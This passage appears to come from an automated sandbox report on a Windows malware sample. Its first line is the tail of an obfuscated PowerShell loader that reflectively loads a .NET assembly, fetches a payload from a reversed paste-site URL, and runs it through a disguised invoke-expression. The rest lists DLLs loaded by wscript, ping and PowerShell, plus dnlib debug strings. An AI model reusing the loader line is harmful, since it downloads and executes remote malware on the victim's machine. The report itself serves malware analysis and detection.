'+'['+'Refl'+'ection.As'+'s'+'embly'+']::L'+'oad({'+'0'+'}'+'binaryCo'+'nt'+'en'+'t); [dnlib'+'.I'+'O.Home]'+'::VA'+'I('+'{1'+'}'+'0/CVfjD'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, {'+'1'+'}de'+'sati'+'v'+'ado{1}'+', '+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}MSBui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')"Jump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb; source: powershell.exe, 00000008.00000002.1730333035.000001B9DFF13000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.1742752814.00007FFB4ACD0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000008.00000002.1732143246.000001B9E0134000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1730333035.000001B9DFE4B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbes(x source: powershell.exe, 00000008.00000002.1733091752.000001B9E0196000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1730333035.000001B9DFF13000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.1742752814.00007FFB4ACD0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.pdb source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
